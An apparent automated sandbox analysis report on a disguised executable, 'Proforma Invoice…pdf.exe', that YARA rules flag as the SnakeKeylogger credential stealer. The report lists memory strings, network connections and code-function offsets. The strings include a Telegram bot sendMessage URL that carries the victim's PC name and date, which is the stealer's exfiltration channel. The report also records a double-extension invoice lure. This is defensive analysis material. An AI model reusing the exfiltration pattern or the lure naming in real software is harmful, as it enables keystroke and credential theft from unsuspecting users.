                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002974000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002974000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4175064237.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002974000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002974000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20a
                Source: vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002CEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.mic
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4175064237.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.82
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.00000000028F7000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002BAF000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.82$
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.824
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.00000000039C7000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003B44000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003952000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003AF6000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.00000000039A0000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002974000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003EDA000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003DB7000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C13000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003BF5000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003AFE000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.000000000395A000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.000000000392D000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.00000000039A2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003AD1000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003BEE000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C63000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003DBD000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003EB7000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.00000000039C7000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003B44000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003952000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003AF6000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.00000000039A0000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002974000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003EDA000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003DB7000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C13000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003BF5000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003AFE000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.000000000395A000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.000000000392D000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.00000000039A2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003AD1000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003BEE000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C63000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003DBD000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003EB7000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002D20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49759 version: TLS 1.2
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_0B069DC8 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0B069DC8
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_0B069DD8 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0B069DD8

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 13.2.vrhZELiHpiub.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 13.2.vrhZELiHpiub.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 13.2.vrhZELiHpiub.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0000000D.00000002.4175064237.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Proforma Invoice_21-1541 And Packing List.pdf.exe PID: 7576, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: vrhZELiHpiub.exe PID: 7364, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: initial sampleStatic PE information: Filename: Proforma Invoice_21-1541 And Packing List.pdf.exe
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_00A5D69C0_2_00A5D69C
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_04DE47900_2_04DE4790
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_04DE47800_2_04DE4780
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_04DE4D400_2_04DE4D40
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_053CF4A00_2_053CF4A0
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_053CC4900_2_053CC490
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_053CF4900_2_053CF490
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_053CF0510_2_053CF051
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_053CF0530_2_053CF053
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_053CBC170_2_053CBC17
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_053C5F300_2_053C5F30
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_053C5F230_2_053C5F23
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_053CF8D80_2_053CF8D8
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_072757780_2_07275778
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_0727655E0_2_0727655E
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_072744EC0_2_072744EC
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_0727C09C0_2_0727C09C
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_07270F380_2_07270F38
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_0727D7B10_2_0727D7B1
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_072713700_2_07271370
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_0737ACE90_2_0737ACE9
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_0B06E3900_2_0B06E390
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_0B0628700_2_0B062870
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_0B0666A10_2_0B0666A1
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_0B0634F00_2_0B0634F0
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_0B0628700_2_0B062870
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 0_2_0B0666A10_2_0B0666A1
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0269D2C99_2_0269D2C9
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_026953629_2_02695362
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0269C1479_2_0269C147
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0269C7889_2_0269C788
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0269D5999_2_0269D599
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0269CA589_2_0269CA58
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0269EAA89_2_0269EAA8
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0269FBB69_2_0269FBB6
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_026969A09_2_026969A0
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_02693E099_2_02693E09
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0269CFF79_2_0269CFF7
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_02696FC89_2_02696FC8
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0269CD289_2_0269CD28
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_02699DE09_2_02699DE0
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0269F76C9_2_0269F76C
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_02693AA19_2_02693AA1
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0269EA9B9_2_0269EA9B
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_026929EC9_2_026929EC
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_06581E809_2_06581E80
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_06580B309_2_06580B30
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_065893289_2_06589328
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658F3B89_2_0658F3B8
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_065817A09_2_065817A0
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_06589C709_2_06589C70
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_065850B69_2_065850B6
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_065825689_2_06582568
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658E2589_2_0658E258
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658E2579_2_0658E257
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_06581E709_2_06581E70
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658DE009_2_0658DE00
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658E6B09_2_0658E6B0
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658E6AF9_2_0658E6AF
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658EF609_2_0658EF60
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658EB089_2_0658EB08
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_06580B209_2_06580B20
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_06588B909_2_06588B90
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658178F9_2_0658178F
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_06588BA09_2_06588BA0
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_065800409_2_06580040
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658FC689_2_0658FC68
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_06589C6D9_2_06589C6D
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658F8109_2_0658F810
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658F8029_2_0658F802
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658003F9_2_0658003F
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658D0F89_2_0658D0F8
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658CCA09_2_0658CCA0
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658D5509_2_0658D550
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_065895489_2_06589548
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658DDFF9_2_0658DDFF
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658D9999_2_0658D999
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeCode function: 9_2_0658D9A89_2_0658D9A8
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 10_2_0081D69C10_2_0081D69C
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 10_2_04AD4D4010_2_04AD4D40
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 10_2_04AD478010_2_04AD4780
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 10_2_04AD479010_2_04AD4790
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0111C14813_2_0111C148
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0111536213_2_01115362
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0111D2C813_2_0111D2C8
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0111D59913_2_0111D599
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0111C46813_2_0111C468
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_011169B013_2_011169B0
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0111CA5813_2_0111CA58
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0111EAA813_2_0111EAA8
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0111CD2813_2_0111CD28
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_01119DE013_2_01119DE0
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0111CFF713_2_0111CFF7
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeCode function: 13_2_0111F35F13_2_0111F35F
